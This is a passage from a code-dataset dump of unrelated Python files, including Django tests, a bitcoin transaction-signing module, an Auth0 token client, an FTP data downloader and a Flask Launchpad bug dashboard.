Import Models\nfrom challenges.views import Challenge\n\n\nclass ChallengesVisitorTest( LoginFunctionalTest ):\n\n ## Challenge Main\n # Avery posts his new challengeboard site for all his computer science friends to check out.\n\n # Rishab visits the site and sees today's challenge as well as a list past challenges on the Challenges Main page.\n\n def test_can_access_challenges_main_and_select_daily_challenge( self ):\n # add challenges to the test database\n Challenge.objects.create( description=\"This is a challenge.\" )\n Challenge.objects.create( description=\"This is another challenge.\" )\n\n response = self.browser.get( self.get_full_url( \"challenges_main\" ) )\n time.sleep( 2 )\n # On the challenges_main page, the user find the challenge of the day.\n page_text = self.browser.find_element_by_tag_name('body').text\n\n self.assertIn(\"Today\", page_text )\n self.assertIn(\"This is a challenge.\", page_text )\n self.assertIn(\"This is another challenge.\", page_text )\n\n def test_challenges_show_date( self ):\n # add a challenge for today to the database\n today_date = datetime.datetime.today()\n Challenge.objects.create( title=\"First Challenge\", description=\"This is the today challenge.\", date=timezone.make_aware( datetime.datetime.today() ) )\n formatted_date = today_date.strftime( \"%a, %b %d\" )\n\n self.browser.get( self.get_full_url( \"challenges_main\" ) )\n page_text = self.browser.find_element_by_tag_name('body').text\n\n self.assertIn( formatted_date, page_text )\n\n ## Challenges Detail\n\n def test_click_from_challenges_main_goes_challenges_detail( self ):\n # add a challenge\n challenge = Challenge.objects.create( description=\"This is a challenge.\" )\n\n response = self.browser.get( self.get_full_url( \"challenges_main\" ) )\n challenge_link = self.browser.find_element_by_class_name( \"challenge_link\" )\n #self.browser.click( challenge_link )\n challenge_link.click()\n\n self.assertRegex( self.browser.current_url, '/challenges/([0-9]+)/' )\n\n ## Challenges Create\n # Rishab wants to create a new challenge so he visits the create challenge page.\n # Rishab types the information for a new challenge into the form and submits it.\n def 
test_can_create_challenge( self ):\n time.sleep( 4 )\n self.browser.get( self.get_full_url( \"challenges_create\" ) )\n\n # get input elements\n description_box = self.browser.find_element_by_id( 'description' )\n title_box = self.browser.find_element_by_id( 'title' )\n description_box.send_keys(\"Description of a challenge.\")\n title_box.send_keys(\"Title of a challenge.\\n\")\n time.sleep( 3 )\n\n self.assertEqual( Challenge.objects.count(), 1 )\n\n\n# Rishab types his newfangled challenge into the new challenge form.\n def test_can_create_new_challenge( self ):\n response = self.client.post(\n '/challenges/create',\n data={ 'description' : 'A new challenges for you.' }\n )\n","sub_path":"functional_tests/test_challenges.py","file_name":"test_challenges.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"84203225","text":"import numpy as np\nfrom pyemto.examples.emto_input_generator import *\n\n\nfolder = os.getcwd() # Get current working directory.\nemtopath = folder+\"/bcc_fcc_ssos\" # Folder where the calculations will be performed.\nlatpath = emtopath\n\n# bcc SSOS-1\nprims = np.array([[0.0,2.0,3.0],\n [-0.5,2.5,2.5],\n [-0.5,-0.5,0.5]])\n\nbasis = np.array([[0.0,0.0,0.0],\n [0.6,0.6,0.4],\n [0.4,0.4,0.6],\n [0.2,0.2,0.8],\n [0.8,0.8,0.2]])\n\n#species = ['A1+','A2+','A3+','A4+','A5+']\nspecies_cpa = [\"Co\",\"Cr\",\"Fe\",\"Mn\",\"Ni\"]\n\ninput_creator = EMTO(folder=emtopath)\n\ninput_creator.init_structure(latpath=latpath,\n prims=prims,\n basis=basis,\n latname='ssos_bcc_1')\n\n\ninput_creator.init_bulk(atoms_cpa=species_cpa)\n\nsws_range = np.linspace(2, 3, 6)\n\ninput_creator.write_bmdl_kstr_shape_input()\ninput_creator.write_kgrn_kfcd_swsrange(sws=sws_range)\n\n#input_creator.draw_structure('output')\n","sub_path":"pyemto/examples/generate_bcc_fcc_ssos.py","file_name":"generate_bcc_fcc_ssos.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"210610939","text":"from django.utils.translation import ugettext as _\nfrom django.contrib.contenttypes.models import ContentType\nfrom listable.views import BaseListableView, SELECT\n\nfrom . 
import models\n\n\nclass StaffList(BaseListableView):\n\n model = models.Staff\n\n fields = (\n \"id\",\n \"name\",\n \"active\",\n \"department__name\",\n \"position__name\",\n \"department__business__name\",\n \"department__business__business_type\",\n \"genericname\",\n )\n\n widgets = {\n \"department__business__name\": SELECT,\n \"department__business__business_type\": SELECT,\n \"position__name\": SELECT,\n \"choices\": SELECT,\n \"active\": SELECT,\n }\n\n search_fields = {\n \"name\": (\"first_name__icontains\", \"last_name__icontains\",),\n \"last_name\": \"last_name__exact\",\n \"genericname\": \"genericname__icontains\",\n \"department__name\": \"department__name__icontains\",\n }\n\n order_fields = {\n \"name\": (\"last_name\", \"first_name\",),\n }\n\n headers = {\n \"position__name\": _(\"Position\"),\n \"department__business__name\": _(\"Business\"),\n \"department__business__business_type\": _(\"Business Type\"),\n }\n\n order_by = (\"-name\",)\n\n select_related = (\"department\", \"position\", \"department__business\",)\n\n def generic(self, obj):\n return obj.generic_object.name\n\n def name(self, staff):\n return staff.name()\n\n def get_extra(self):\n cta = ContentType.objects.get_for_model(models.GenericModelA)\n ctb = ContentType.objects.get_for_model(models.GenericModelB)\n\n extraq = \"\"\"\n CASE\n WHEN content_type_id = {0}\n THEN (SELECT name from staff_genericmodela WHERE object_id = staff_genericmodela.id)\n WHEN content_type_id = {1}\n THEN (SELECT name from staff_genericmodelb WHERE object_id = staff_genericmodelb.id)\n END\n \"\"\".format(cta.pk, ctb.pk)\n\n return {\"select\": {'genericname': extraq}}\n","sub_path":"listable-demo/staff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"201204059","text":"from accessors.api_restful_accessor import APIConnector\nimport os\nimport json\nimport builtins\n\n\nclass Auth0APIConnector(APIConnector):\n \"\"\"\n Class for connecting to Auth0\n \"\"\"\n\n def __init__(self, auth_token, x_request_id):\n super(Auth0APIConnector, self).__init__('Auth0APIConnector', '', '')\n self._host_url = builtins.environment_config[builtins.study_id][builtins.environment][\n 'auth0_url']\n\n \"\"\"\n returns request response from Auth0\n :param:\n :return: To retrieve token: request.content)['access_token']\n \"\"\"\n def retrieve_access_token(self):\n\n path = '/v2/oauth/token'\n self._data = self.create_payload()\n self._headers = {'Content-type': 'application/json'}\n return self._connect(path)\n\n \"\"\"\n returns request response from Auth0 with email addresses and other metadata for specified role \n :param: site name for roles generation for URL params \n :return: executes REST operation\n \"\"\"\n def retrieve_recipients(self, site):\n auth_token = ((Auth0APIConnector('', '').retrieve_access_token()).json())['access_token']\n\n self._headers = {'authorization': \"Bearer \" + auth_token}\n self._http_verb = 'get'\n path = '/api/v2/users?q=app_metadata.roles.%5C*%3A%20' + site.upper() + '_VARIANT_REPORT_REVIEWER'\n return self._connect(path)\n\n \"\"\"\n Creates payload needed in order to access metadata related to roles\n :param: \n :return: \n \"\"\"\n @staticmethod\n def create_payload():\n return {\n \"grant_type\": \"client_credentials\",\n \"client_id\": os.environ['AUTH0_MANAGEMENT_ID'],\n \"client_secret\": os.environ['AUTH0_MANAGEMENT_SECRET'],\n \"audience\": 
builtins.environment_config[builtins.study_id][builtins.environment][\n 'auth0_url'] + \"/api/v2/\"\n }\n","sub_path":"common/auth0_connector.py","file_name":"auth0_connector.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"244926111","text":"import logging\nfrom collections import namedtuple\nfrom itertools import islice\nimport re\n\nfrom bit.crypto import double_sha256, sha256\nfrom bit.exceptions import InsufficientFunds\nfrom bit.format import address_to_public_key_hash, TEST_SCRIPT_HASH, MAIN_SCRIPT_HASH\nfrom bit.network.rates import currency_to_satoshi_cached\nfrom bit.utils import (\n bytes_to_hex, chunk_data, hex_to_bytes, int_to_unknown_bytes, int_to_varint, script_push, get_signatures_from_script\n)\n\nfrom bit.format import verify_sig\nfrom bit.base58 import b58decode_check\n\nVERSION_1 = 0x01.to_bytes(4, byteorder='little')\nSEQUENCE = 0xffffffff.to_bytes(4, byteorder='little')\nLOCK_TIME = 0x00.to_bytes(4, byteorder='little')\nHASH_TYPE = 0x01.to_bytes(4, byteorder='little')\n\nOP_0 = b'\\x00'\nOP_CHECKLOCKTIMEVERIFY = b'\\xb1'\nOP_CHECKSIG = b'\\xac'\nOP_DUP = b'v'\nOP_EQUALVERIFY = b'\\x88'\nOP_HASH160 = b'\\xa9'\nOP_PUSH_20 = b'\\x14'\nOP_RETURN = b'\\x6a'\nOP_EQUAL = b'\\x87'\n\nMESSAGE_LIMIT = 40\n\n\nclass TxIn:\n __slots__ = ('script', 'script_len', 'txid', 'txindex', 'sequence')\n\n def __init__(self, script, txid, txindex, sequence=SEQUENCE):\n self.script = script\n self.script_len = int_to_varint(len(script))\n self.txid = txid\n self.txindex = txindex\n self.sequence = sequence\n\n def __eq__(self, other):\n return (self.script == other.script and\n self.script_len == other.script_len and\n self.txid == other.txid and\n self.txindex == other.txindex and\n self.sequence == other.sequence)\n\n def __repr__(self):\n return 'TxIn({}, {}, {}, {}, {})'.format(\n repr(self.script),\n repr(self.script_len),\n repr(self.txid),\n repr(self.txindex),\n repr(self.sequence)\n )\n\n\nOutput = namedtuple('Output', ('address', 'amount', 'currency'))\n\n\nclass TxOut:\n __slots__ = ('value', 'script_len', 'script')\n\n def __init__(self, value, script):\n self.value = value\n self.script = script\n self.script_len = int_to_varint(len(script))\n\n def __eq__(self, other):\n return (self.value == other.value and\n self.script == other.script and\n self.script_len == other.script_len)\n\n def __repr__(self):\n return 'TxOut({}, {}, {})'.format(\n repr(self.value),\n repr(self.script),\n repr(self.script_len)\n )\n\n\nclass TxObj:\n __slots__ = ('version', 'TxIn', 'input_count', 'TxOut', 'output_count', 'locktime')\n\n def __init__(self, version, TxIn, TxOut, locktime):\n self.version = version\n self.TxIn = TxIn\n self.input_count = len(TxIn)\n self.TxOut = TxOut\n self.output_count = len(TxOut)\n self.locktime = locktime\n\n def __eq__(self, other):\n return (self.version == other.version and\n self.TxIn == other.TxIn and\n self.input_count == other.input_count and\n self.TxOut == other.TxOut and\n self.output_count == other.output_count and\n self.locktime == other.locktime)\n\n def __repr__(self):\n return 'TxObj({}, {}, {}, {})'.format(\n repr(self.version),\n repr(self.TxIn),\n repr(self.TxOut),\n repr(self.locktime)\n )\n\n\ndef calc_txid(tx_hex):\n return bytes_to_hex(double_sha256(hex_to_bytes(tx_hex))[::-1])\n\n\ndef estimate_tx_fee(n_in, n_out, satoshis, compressed):\n\n if not satoshis:\n return 0\n\n estimated_size = (\n n_in * (148 if compressed else 180)\n + 
len(int_to_unknown_bytes(n_in, byteorder='little'))\n + n_out * 34\n + len(int_to_unknown_bytes(n_out, byteorder='little'))\n + 8\n )\n\n estimated_fee = estimated_size * satoshis\n\n logging.debug('Estimated fee: {} satoshis for {} bytes'.format(estimated_fee, estimated_size))\n\n return estimated_fee\n\n\ndef deserialize(txhex):\n if isinstance(txhex, str) and re.match('^[0-9a-fA-F]*$', txhex):\n #return deserialize(binascii.unhexlify(txhex))\n return deserialize(hex_to_bytes(txhex))\n\n pos = [0]\n\n def read_as_int(bytez):\n pos[0] += bytez\n return int(bytes_to_hex(txhex[pos[0]-bytez:pos[0]][::-1]), base=16)\n\n def read_var_int():\n pos[0] += 1\n\n val = int(bytes_to_hex(txhex[pos[0]-1:pos[0]]), base=16)\n if val < 253:\n return val\n return read_as_int(pow(2, val - 252))\n\n def read_bytes(bytez):\n pos[0] += bytez\n return txhex[pos[0]-bytez:pos[0]]\n\n def read_var_string():\n size = read_var_int()\n return read_bytes(size)\n\n version = read_as_int(4).to_bytes(4, byteorder='little')\n\n ins = read_var_int()\n inputs = []\n for _ in range(ins):\n txid = read_bytes(32)\n txindex = read_as_int(4).to_bytes(4, byteorder='little')\n script = read_var_string()\n sequence = read_as_int(4).to_bytes(4, byteorder='little')\n inputs.append(TxIn(script, txid, txindex, sequence))\n\n outs = read_var_int()\n outputs = []\n for _ in range(outs):\n value = read_as_int(8).to_bytes(8, byteorder='little')\n script = read_var_string()\n outputs.append(TxOut(value, script))\n\n locktime = read_as_int(4).to_bytes(4, byteorder='little')\n\n txobj = TxObj(version, inputs, outputs, locktime)\n\n return txobj\n\n\ndef sanitize_tx_data(unspents, outputs, fee, leftover, combine=True, message=None, compressed=True):\n \"\"\"\n sanitize_tx_data()\n\n fee is in satoshis per byte.\n \"\"\"\n\n outputs = outputs.copy()\n\n for i, output in enumerate(outputs):\n dest, amount, currency = output\n outputs[i] = (dest, currency_to_satoshi_cached(amount, currency))\n\n if not unspents:\n raise ValueError('Transactions must have at least one unspent.')\n\n # Temporary storage so all outputs precede messages.\n messages = []\n\n if message:\n message_chunks = chunk_data(message.encode('utf-8'), MESSAGE_LIMIT)\n\n for message in message_chunks:\n messages.append((message, 0))\n\n # Include return address in output count.\n num_outputs = len(outputs) + len(messages) + 1\n sum_outputs = sum(out[1] for out in outputs)\n\n total_in = 0\n\n if combine:\n # calculated_fee is in total satoshis.\n calculated_fee = estimate_tx_fee(len(unspents), num_outputs, fee, compressed)\n total_out = sum_outputs + calculated_fee\n unspents = unspents.copy()\n total_in += sum(unspent.amount for unspent in unspents)\n\n else:\n unspents = sorted(unspents, key=lambda x: x.amount)\n\n index = 0\n\n for index, unspent in enumerate(unspents):\n total_in += unspent.amount\n calculated_fee = estimate_tx_fee(len(unspents[:index + 1]), num_outputs, fee, compressed)\n total_out = sum_outputs + calculated_fee\n\n if total_in >= total_out:\n break\n\n unspents[:] = unspents[:index + 1]\n\n remaining = total_in - total_out\n\n if remaining > 0:\n outputs.append((leftover, remaining))\n elif remaining < 0:\n raise InsufficientFunds('Balance {} is less than {} (including '\n 'fee).'.format(total_in, total_out))\n\n outputs.extend(messages)\n\n return unspents, outputs\n\n\ndef construct_outputs(outputs):\n outputs_obj = []\n\n for data in outputs:\n dest, amount = data\n\n # P2SH\n if amount and (b58decode_check(dest)[0:1] == MAIN_SCRIPT_HASH or \n 
b58decode_check(dest)[0:1] == TEST_SCRIPT_HASH):\n            script = (OP_HASH160 + OP_PUSH_20 +\n                      address_to_public_key_hash(dest) +\n                      OP_EQUAL)\n\n            amount = amount.to_bytes(8, byteorder='little')\n\n        # P2PKH\n        elif amount:\n            script = (OP_DUP + OP_HASH160 + OP_PUSH_20 +\n                      address_to_public_key_hash(dest) +\n                      OP_EQUALVERIFY + OP_CHECKSIG)\n\n            amount = amount.to_bytes(8, byteorder='little')\n\n        # Blockchain storage\n        else:\n            script = (OP_RETURN +\n                      len(dest).to_bytes(1, byteorder='little') +\n                      dest)\n\n            amount = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n\n        outputs_obj.append(TxOut(amount, script))\n\n    return outputs_obj\n\n\ndef construct_input_block(inputs):\n\n    input_block = b''\n    sequence = SEQUENCE\n\n    for txin in inputs:\n        input_block += (\n            txin.txid +\n            txin.txindex +\n            txin.script_len +\n            txin.script +\n            sequence\n        )\n\n    return input_block\n\ndef sign_legacy_tx(private_key, tx, j=-1):\n    # j is the input to be signed: a single index, a list of indices, or -1 for all inputs\n\n    if not isinstance(tx, TxObj):\n        tx = deserialize(tx)\n\n    version = tx.version\n    lock_time = tx.locktime\n    hash_type = HASH_TYPE\n\n    input_count = int_to_varint(tx.input_count)\n    output_count = int_to_varint(tx.output_count)\n\n    output_block = b''\n    for i in range(tx.output_count):\n        output_block += tx.TxOut[i].value\n        output_block += tx.TxOut[i].script_len\n        output_block += tx.TxOut[i].script\n\n    inputs = tx.TxIn\n\n    if j < 0:\n        j = range(len(inputs))\n    elif not isinstance(j, list):\n        j = [j]\n\n    for i in j:\n\n        public_key = private_key.public_key\n        public_key_len = script_push(len(public_key))\n\n        scriptCode = private_key.scriptcode\n        scriptCode_len = int_to_varint(len(scriptCode))\n\n        hashed = sha256(\n            version +\n            input_count +\n            b''.join(ti.txid + ti.txindex + OP_0 + ti.sequence\n                     for ti in islice(inputs, i)) +\n            inputs[i].txid +\n            inputs[i].txindex +\n            scriptCode_len +\n            scriptCode +\n            inputs[i].sequence +\n            b''.join(ti.txid + ti.txindex + OP_0 + ti.sequence\n                     for ti in islice(inputs, i + 1, None)) +\n            output_count +\n            output_block +\n            lock_time +\n            hash_type\n        )\n\n        signature = private_key.sign(hashed) + b'\\x01'\n\n        # ------------------------------------------------------------------\n        if private_key.instance == 'MultiSig' or private_key.instance == 'MultiSigTestnet':\n\n            script_blob = b''\n            sigs = {}\n            if tx.TxIn[i].script:  # If tx is already partially signed: build a dictionary of the provided signatures, keyed by public key\n                sig_list = get_signatures_from_script(tx.TxIn[i].script)\n                if len(sig_list) > private_key.m:\n                    raise TypeError('Transaction is already signed with {} of {} needed signatures.'.format(len(sig_list), private_key.m))\n                for sig in sig_list:\n                    for pub in private_key.public_keys:\n                        if verify_sig(sig[:-1], hashed, hex_to_bytes(pub)):\n                            sigs[pub] = sig\n
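                # Editor's note: a spendable m-of-n P2SH scriptSig has the form\n                # OP_0 <sig_1> ... <sig_m> <redeemscript>, and the signatures must appear\n                # in the same order as their public keys in the redeemscript (the\n                # sorting loop below enforces this).\n                script_blob += b'\\x00' * (private_key.m - len(sig_list)-1)  # Bitcoin Core convention: Every missing signature is denoted by 0x00. 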
Only used for already partially-signed scriptSigs.\n\n sigs[bytes_to_hex(public_key)] = signature\n\n script_sig = b'' # P2SH - Multisig\n for pub in private_key.public_keys: # Sort the signatures according to the public-key list:\n if pub in sigs:\n sig = sigs[pub]\n length = script_push(len(sig))\n script_sig += length + sig\n\n script_sig = b'\\x00' + script_sig + script_blob\n script_sig += script_push(len(private_key.redeemscript)) + private_key.redeemscript\n\n # ------------------------------------------------------------------\n else:\n script_sig = ( # P2PKH\n len(signature).to_bytes(1, byteorder='little') +\n signature +\n public_key_len +\n public_key\n )\n\n inputs[i].script = script_sig\n inputs[i].script_len = int_to_varint(len(script_sig))\n\n return bytes_to_hex(\n version +\n input_count +\n construct_input_block(inputs) +\n output_count +\n output_block +\n lock_time\n )\n\n\ndef create_new_transaction(private_key, unspents, outputs):\n\n version = VERSION_1\n lock_time = LOCK_TIME\n outputs = construct_outputs(outputs)\n\n # Optimize for speed, not memory, by pre-computing values.\n inputs = []\n for unspent in unspents:\n script = b'' # empty scriptSig for new unsigned transaction.\n txid = hex_to_bytes(unspent.txid)[::-1]\n txindex = unspent.txindex.to_bytes(4, byteorder='little')\n\n inputs.append(TxIn(script, txid, txindex))\n\n tx_unsigned = TxObj(version, inputs, outputs, lock_time)\n\n tx = sign_legacy_tx(private_key, tx_unsigned)\n return tx\n","sub_path":"bit/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":13016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"439506091","text":"#!/usr/bin/python3\r\n# coding=utf-8\r\n# author: 左懒\r\n\r\nfrom PIL import Image\r\n\r\ncolor = '*&HQ$OC?7>!:-;.'\r\n\r\n\r\ndef make_char_image(image):\r\n pixel = image.load()\r\n picture_chars = ''\r\n width, height = image.size\r\n for h in range(0, height):\r\n for w in range(0, width):\r\n picture_chars += color[int(int(pixel[w, h]) * 14 / 255)]\r\n picture_chars += '\\n'\r\n return picture_chars\r\n\r\n\r\ndef preprocess(image_path):\r\n image = Image.open(image_path)\r\n width, height = image.size\r\n m = max(image.size)\r\n delta = m / 200.0\r\n width, height = int(width / delta), int(height / delta)\r\n image = image.resize((width, height))\r\n image = image.convert('L')\r\n return image\r\n\r\n\r\nimage = preprocess('1.jpg')\r\nchars = make_char_image(image)\r\nfp = open('2.txt', 'w')\r\nfp.write(chars)\r\nfp.close()\r\n","sub_path":"convi.py","file_name":"convi.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"80625530","text":"__author__ = \"Koech Nicholas\"\n__copyright__ = \"Copyright 2018\"\n__email__ = \"koechnicholas@gmail.com\"\n__status__ = \"draft\"\n\nfrom contextlib import closing\nfrom datetime import datetime\nimport ftplib\nimport os\nimport re\nimport sys\nimport urlparse\n\n\ndef _is_item_dir(ftp_handle, item, param):\n \"\"\"Checks if an item is directory or file\"\"\"\n if param['extension']:\n if len(item.rsplit('/', 1)[-1]) >= 4:\n if item[-3:] == param['extension'] or item[-4:] == param['extension']:\n return False\n original_cwd = ftp_handle.pwd()\n try:\n ftp_handle.cwd(item) # Try to change to the new directory\n ftp_handle.cwd(original_cwd) # Set cwd to the original working directory\n return True\n except:\n return False\n\ndef _is_int (str):\n \"\"\"Check if 
string is an integer\"\"\"\n try:\n int(str)\n return True\n except ValueError:\n return False\n\ndef _set_path(ftp_path, param):\n \"\"\"Create local paths\"\"\"\n ftp_items = ftp_path.split('/')\n region = param['region'] + '_'\n product = [region + i for i in param['product'] if region + i in ftp_items]\n idx = ftp_items.index(product[0])\n dest_dir = os.path.join(param['dest'], '/'.join(ftp_items[idx:-1])).replace('\\\\', '/')\n dest_file = os.path.join(param['dest'], '/'.join(ftp_items[idx:])).replace('\\\\', '/')\n return dest_dir, dest_file\n\ndef _make_parent_dir(fpath):\n \"\"\"Creates parent directory if it does not exist\"\"\"\n dir_name = fpath\n while not os.path.exists(dir_name):\n try:\n os.makedirs(dir_name)\n print(\"Created: {0}\".format(dir_name))\n except:\n _make_parent_dir(dir_name)\n\ndef _download_ftp_file(ftp_handle, ftp_path, param):\n \"\"\"Download a single file from FTP server \"\"\" \n dest_dir, dest_file = _set_path(ftp_path, param) \n _make_parent_dir(dest_dir) \n if not os.path.exists(dest_file):\n try:\n with open(dest_file, 'wb') as f:\n ftp_handle.retrbinary(\"RETR {0}\".format(ftp_path), f.write)\n print(\"Downloaded: {0}\".format(dest_file))\n except IOError:\n print(\"FAILED: {0}\".format(dest_file))\n else:\n print(\"already exists: {0}\".format(dest_file))\n\ndef _format_date(raw_date):\n \"\"\"Format date into year, month and day\"\"\"\n date = []\n for c, v in enumerate(raw_date):\n if c > 0 and len(v) >= 3:\n for i in range(0, len(v), 2):\n date.append(int(v[i:i + 2]))\n else:\n date.append(int(v))\n ln = len(date)\n if ln == 3:\n return {'year': date[0], 'month': date[1], 'date': date[2]}\n elif ln == 2:\n return {'year': date[0], 'month': date[1]}\n else:\n return {'year': date[0]}\n\ndef _get_date(ftp_path, years):\n \"\"\"Get file date as digits\"\"\"\n f_name = ftp_path.rsplit('/', 1)[-1]\n f_name = f_name.split('.')\n for c, v in enumerate(f_name):\n if _is_int(v):\n if int(v) in years:\n raw_date = [i for i in f_name[c:] if _is_int(i)]\n return _format_date(raw_date)\n\ndef _filter_ftp_file(ftp_handle, ftp_path, param):\n \"\"\" Get valid file and download \"\"\"\n num_years = [datetime.today().year - i for i in xrange(49)] # number of years to be compared with\n date = _get_date(ftp_path, num_years) # get file date\n param_keys = [k for k, v in param.items() if v and k in ('year', 'month', 'date')] # user dates with values \n if param_keys and date:\n param_date_keys = [k for k in param_keys if k in date.keys()]\n matched_keys = [k for k, v in date.items() if k in param_keys and v in param[k]] # Matched keys\n if len(param_keys) >= len(date) and len(date) == len(matched_keys):\n _download_ftp_file(ftp_handle, ftp_path, param)\n elif len(date) > len(param_keys) and len(param_date_keys) == len(matched_keys):\n _download_ftp_file(ftp_handle, ftp_path, param)\n\ndef _mirror_ftp_dir(ftp_handle, ftp_path, param):\n \"\"\"Replicates a directory on an ftp server recursively\"\"\"\n for item in ftp_handle.nlst(ftp_path):\n if _is_item_dir(ftp_handle, item, param):\n if param['year']:\n product_year = item.rsplit('/', 1)[-1]\n if _is_int(product_year) and int(product_year) in param['year']:\n _mirror_ftp_dir(ftp_handle, item, param) \n else:\n _mirror_ftp_dir(ftp_handle, item, param)\n else:\n _filter_ftp_file(ftp_handle, item, param) # get valid file and download\n\ndef _download_ftp_tree(ftp_url, param):\n \"\"\"List and download files\"\"\"\n with closing(ftplib.FTP(urlparse.urlsplit(ftp_url).netloc)) as ftp:\n try:\n ftp.login()\n ftp_path = 
urlparse.urlsplit(ftp_url).path.lstrip('/')\n            _mirror_ftp_dir(ftp, ftp_path, param)\n        except ftplib.all_errors as e:\n            print('FTP error:', e)\n\ndef _generate_list(param):\n    \"\"\"Generate integer values from range of values\"\"\"\n    keys = ['year', 'month', 'date']\n    for k in keys:\n        if k in param.keys() and param[k]:\n            for lst in list(param[k]):  # Copy original list for removal on iteration\n                if not _is_int(lst):\n                    boundary_vals = map(int, lst.split('-'))\n                    param[k].remove(lst)\n                    param[k].extend(list(range(min(boundary_vals), max(boundary_vals) + 1)))\n\ndef ftp_download(param):\n    \"\"\"Set the right product URL and download\"\"\"\n    base_url = param['base_url'].strip('/') + '/'\n    _generate_list(param)\n    if param['region']:\n        region_url = urlparse.urljoin(base_url, param['region'].strip('/'))\n        if param['product']:\n            for i in param['product']:\n                url = region_url + '_' + i + '/'\n                if i == 'daily':\n                    product_url = urlparse.urljoin(url, 'tifs/p05/')\n                else:\n                    product_url = urlparse.urljoin(url, 'tifs/')\n                _download_ftp_tree(product_url, param)\n        else:\n            product_url = urlparse.urljoin(region_url + '_daily/', 'tifs/p05/')  # Daily product used as default\n            param['product'] = 'daily'\n            _download_ftp_tree(product_url, param)\n    else:\n        print('Region is not set. Please include it in the .json file.')\n","sub_path":"Python Scripts/CHIRPS_Processor/ftpdownload.py","file_name":"ftpdownload.py","file_ext":"py","file_size_in_byte":6441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"456462173","text":"\"\"\"\ncheck the username and QQ number\n\"\"\"\n\nimport re\n\n\ndef main():\n    username = input('Pls input the username:')\n    qq = input('Pls input the QQ number:')\n    # the first argument of re.match is the regex pattern\n    # the second argument is the string to be matched\n    m1 = re.match(r'^[0-9a-zA-Z_]{6,20}$', username)\n    if not m1:\n        print('Pls input a valid username.')\n    m2 = re.match(r'^[1-9]\\d{4,11}$', qq)\n    if not m2:\n        print('Pls input a valid QQ num.')\n    if m1 and m2:\n        print('your input is valid.')\n\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n","sub_path":"Day01-15/code/Day12/test_str1.py","file_name":"test_str1.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"519146141","text":"def test(arr):\n    first_positive = len(arr)\n    for i in range(0,len(arr)):\n        if arr[i]>=0:\n            first_positive = i\n            break\n    for i in range(first_positive,len(arr)):\n        if arr[i]<0:\n            print(\"False\")\n            return\n    print(\"True\")\n\n\ndef test_1():\n    arr1 = [1,-2,3,-7,0]\n    test(split(arr1))\n    arr2 = [-1,2,-3]\n    test(split(arr2))\n    arr3 = [-1, -2, -3]\n    test(split(arr3))\n    arr4 = [1, 2, 3]\n    test(split(arr4))\n    arr5 = [1,2,3,-1,-2,-3,4]\n    test(split(arr5))\n\ndef split_1(arr1):\n    for i in range(0,len(arr1)):\n        for j in range(i+1,len(arr1)):\n            if arr1[i] > arr1[j] and arr1[j]<0:\n                temp = arr1[i]\n                arr1[i] = arr1[j]\n                arr1[j] = temp\n    return(arr1)\n\ndef split(arr1):\n    \"\"\"Partition arr1 in place so every negative value precedes the non-negatives.\"\"\"\n    # k marks the end of the negative prefix; swapping arr1[i] with arr1[k]\n    # keeps arr1[:k] negative and arr1[k:i] non-negative throughout the scan.\n    k = 0\n    for i in range(len(arr1)):\n        if arr1[i] < 0:\n            arr1[i], arr1[k] = arr1[k], arr1[i]\n            k = k + 1\n    return 
arr1\n\n\n\n\n\ntest_1()","sub_path":"split_positive_negative.py","file_name":"split_positive_negative.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"514234196","text":"#import httplib2\nimport requests, json, flask\nfrom launchpad.release_chart import ReleaseChart\nfrom launchpad.lpdata import LaunchpadData\n\n#httplib2.debuglevel = 1\n\napp = flask.Flask(__name__)\nlpdata = LaunchpadData()\n\n@app.route('/project//bug_table_for_status//')\ndef bug_table_for_status(project_name, bug_type, milestone_name):\n project = lpdata.get_project(project_name)\n return flask.render_template(\"bug_table.html\", project=project)\n\n@app.route('/project//bug_table_for_status///bug_list')\ndef bug_list(project_name, bug_type, milestone_name):\n project = lpdata.get_project(project_name)\n tags = None\n if 'tags' in flask.request.args:\n tags = flask.request.args['tags'].split(',')\n bugs = lpdata.get_bugs(project_name, LaunchpadData.BUG_STATUSES[bug_type], milestone_name, tags)\n return flask.render_template(\"bug_list.html\", project=project, bugs=bugs, bug_type=bug_type, milestone_name=milestone_name, selected_bug_table=True)\n\n@app.route('/project/')\ndef project_overview(project_name):\n project = lpdata.get_project(project_name)\n return flask.render_template(\"project.html\", project=project, selected_overview=True)\n\n@app.route('/project//bug_trends/')\ndef bug_trends(project_name, milestone_name):\n project = lpdata.get_project(project_name)\n return flask.render_template(\"bug_trends.html\", project=project, milestone_name=milestone_name, selected_bug_trends=True)\n\n@app.route('/project//api/release_chart_trends//get_data')\ndef bug_report_trends_data(project_name, milestone_name):\n data = ReleaseChart(lpdata, project_name, milestone_name).get_trends_data()\n return flask.json.dumps(data)\n\n@app.route('/project//api/release_chart_incoming_outgoing//get_data')\ndef bug_report_get_incoming_outgoing_data(project_name, milestone_name):\n data = ReleaseChart(lpdata, project_name, milestone_name).get_incoming_outgoing_data()\n return flask.json.dumps(data)\n\n@app.route('/')\ndef main_page():\n return flask.redirect(flask.url_for(\"project_overview\", project_name=\"fuel\"))\n\nif __name__ == \"__main__\":\n app.run(host = \"0.0.0.0\", port = 4444, threaded = True, debug = 